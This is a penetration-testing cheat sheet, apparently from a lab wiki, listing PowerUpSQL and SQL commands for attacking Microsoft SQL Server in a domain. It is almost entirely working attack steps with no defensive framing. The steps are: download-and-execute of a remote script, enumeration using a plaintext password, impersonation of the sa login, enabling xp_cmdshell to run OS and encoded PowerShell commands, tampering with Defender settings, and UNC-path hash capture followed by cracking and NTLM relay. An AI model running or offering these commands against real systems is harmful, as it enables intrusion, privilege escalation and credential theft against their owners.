PowerUpSQL

First Instance

# Import PowerUpSQL
iex (New-Object Net.WebClient).DownloadString('http://10.10.10.10/PowerUpSQL.ps1')

# Discovery and verify network access
Get-SQLInstanceDomain | Get-SQLConnectionTest
Get-SQLInstanceDomain | Get-SQLConnectionTest -Username vulnableone.local\khan.chanthou -Password Password123

# Local Instance
Get-SQLInstanceLocal

# Verify Server Information
Get-SQLServerInfo -Instance "appsrv.vulnableone.local,1433"

# Find Link
Get-SQLServerLink -Instance "APPSRV.vulnableone.local,1433"

# Find Link automatically
Get-SQLServerLinkCrawl -Instance "APPSRV.vulnableone.local,1433"

# Query
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "select @@servername"
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "select CURRENT_USER"
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "select user_name()"
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "select loginname from syslogins where sysadmin = 1"
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "select * from sysusers" | select name
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "select name from sys.databases"
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "select srvname from sysservers"
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "exec sp_linkedservers"
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "exec sp_helplinkedsrvlogin"
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "SELECT srvname, srvproduct, rpcout FROM master..sysservers"

# Verify sysadmin privilege
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "SELECT IS_SRVROLEMEMBER('sysadmin')"
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "EXECUTE AS login = 'sa'; SELECT IS_SRVROLEMEMBER('sysadmin')"

# Finding Impersonate
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'"

# Enable RCP_Out
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "EXECUTE AS LOGIN = 'sa'; EXEC sp_serveroption 'APPSRV01','rpc out','true'"
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "EXECUTE AS LOGIN = 'sa'; EXEC sp_serveroption 'APPSRV01','rcp', 'true'"

# Verify xp_cmdshell, value = 1, value_in_use =1
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell'"

# Enable xp_cmdshell, used Login As
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "EXECUTE AS LOGIN = 'sa'; EXEC sp_configure 'show advanced options',1;RECONFIGURE ;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE"

# Impersonate and Execute Command
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "EXECUTE AS LOGIN = 'sa'; exec xp_cmdshell 'powershell -c Set-MpPreference -DisableRealtimeMonitoring $False -Verboes'"
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "EXECUTE AS LOGIN = 'sa'; exec xp_cmdshell 'whoami'"
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "EXECUTE AS LOGIN = 'sa'; exec xp_cmdshell 'powershell -enc base64'"

# UNC Path
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "EXEC xp_dirtree '\\10.10.10.10\test'"
└─$ sudo responder -I tun0 -v    #Capture Hash
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt    #CrackHash
└─$ impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.10.10    #NTLM Relay

Second Instance

Third Instance

PreviousMS SQL ServersNextSQL Server Management

Last updated